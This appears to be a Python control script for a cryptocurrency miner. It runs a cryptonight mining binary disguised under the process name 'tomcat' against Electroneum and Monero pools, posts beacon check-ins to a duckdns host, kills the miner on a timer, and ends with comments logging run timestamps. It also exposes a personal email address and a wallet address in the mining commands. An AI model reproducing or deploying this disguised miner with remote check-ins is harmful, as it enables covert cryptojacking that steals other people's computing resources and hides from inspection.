import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:01.276855
#2018-02-17 16:27:03.492114
#2018-02-17 18:14:01.755849
#2018-02-17 20:02:02.176861
#2018-02-17 21:50:06.220705
#2018-02-17 23:34:06.990111
#2018-02-18 01:23:04.106954
#2018-02-18 03:10:08.003009
#2018-02-18 04:57:06.518689
#2018-02-18 06:48:05.358849
#2018-02-18 08:36:08.188432
#2018-02-18 10:22:07.336551
#2018-02-18 12:08:06.315336
#2018-02-18 13:53:06.473055
#2018-02-18 15:45:05.805643
#2018-02-18 17:34:07.756103
#2018-02-18 19:22:03.844689
#2018-02-18 21:08:01.443060
#2018-02-18 22:55:01.363640
#2018-02-19 00:43:06.143934
#2018-02-19 02:29:04.309507
#2018-02-19 04:16:04.279114
#2018-02-19 05:59:05.726176
#2018-02-19 07:48:01.764263
#2018-02-19 09:38:03.867749
#2018-02-19 11:26:07.494257
#2018-02-19 13:12:08.173421
#2018-02-19 15:01:07.120714
#2018-02-19 16:49:09.810677
#2018-02-19 18:36:05.301766
#2018-02-19 20:21:06.255536
#2018-02-19 22:09:08.648596
#2018-02-19 23:57:04.194537
#2018-02-20 01:44:03.644838
#2018-02-20 03:32:09.236497
#2018-02-20 05:19:06.114724
#2018-02-20 07:03:06.185341
#2018-02-20 08:48:04.237794
#2018-02-20 10:32:05.700390
#2018-02-20 12:17:04.392700
#2018-02-20 14:05:05.335422
#2018-02-20 15:49:08.972859
#2018-02-20 17:36:04.927066
#2018-02-20 19:23:02.154334
#2018-02-20 21:13:01.444395
#2018-02-20 22:58:07.870120
#2018-02-21 00:43:01.507837
#2018-02-21 02:29:04.322338
#2018-02-21 04:17:05.671444
#2018-02-21 06:04:02.199262
#2018-02-21 07:51:03.192060
#2018-02-21 09:36:09.494766
#2018-02-21 11:24:01.775040
#2018-02-21 13:12:06.620028
#2018-02-21 14:59:01.892102
#2018-02-21 16:47:11.857759
#2018-02-21 18:38:01.383734
#2018-02-21 20:23:04.010679
#2018-02-21 22:12:01.320686
#2018-02-22 00:01:06.779108
#2018-02-22 01:49:05.830200
#2018-02-22 03:37:06.444160
#2018-02-22 05:24:04.569824
#2018-02-22 07:09:01.500881
#2018-02-22 08:55:05.535923
#2018-02-22 10:43:07.717026
#2018-02-22 12:29:01.538695
#2018-02-22 14:13:06.786091
#2018-02-22 16:01:05.515324
#2018-02-22 17:47:08.448131
#2018-02-22 19:34:06.203240
#2018-02-22 21:26:06.488579
#2018-02-22 23:14:01.523038
#2018-02-23 01:01:06.110443
#2018-02-23 02:49:01.839768
#2018-02-23 04:36:07.395014
#2018-02-23 06:22:05.787748
#2018-02-23 08:10:01.663395
#2018-02-23 10:27:06.428999
#2018-02-23 12:20:11.236758
#2018-02-23 14:09:06.970422
#2018-02-23 15:58:07.751563
#2018-02-23 17:46:04.490647
#2018-02-23 19:33:07.138024
#2018-02-23 21:16:07.206441
#2018-02-23 23:05:06.100469
#2018-02-24 00:49:05.427155
#2018-02-24 02:40:08.241037
#2018-02-24 04:36:07.143693
#2018-02-24 06:21:02.032031
#2018-02-24 08:09:02.214559
#2018-02-24 09:53:03.758020
#2018-02-24 11:48:07.458849
#2018-02-24 13:40:07.955400
#2018-02-24 15:27:01.912542
#2018-02-24 17:16:05.837789
#2018-02-24 19:07:01.772283
#2018-02-24 20:55:08.205892
#2018-02-24 23:21:07.810110
#2018-02-25 02:46:06.253332
#2018-02-25 06:27:03.329068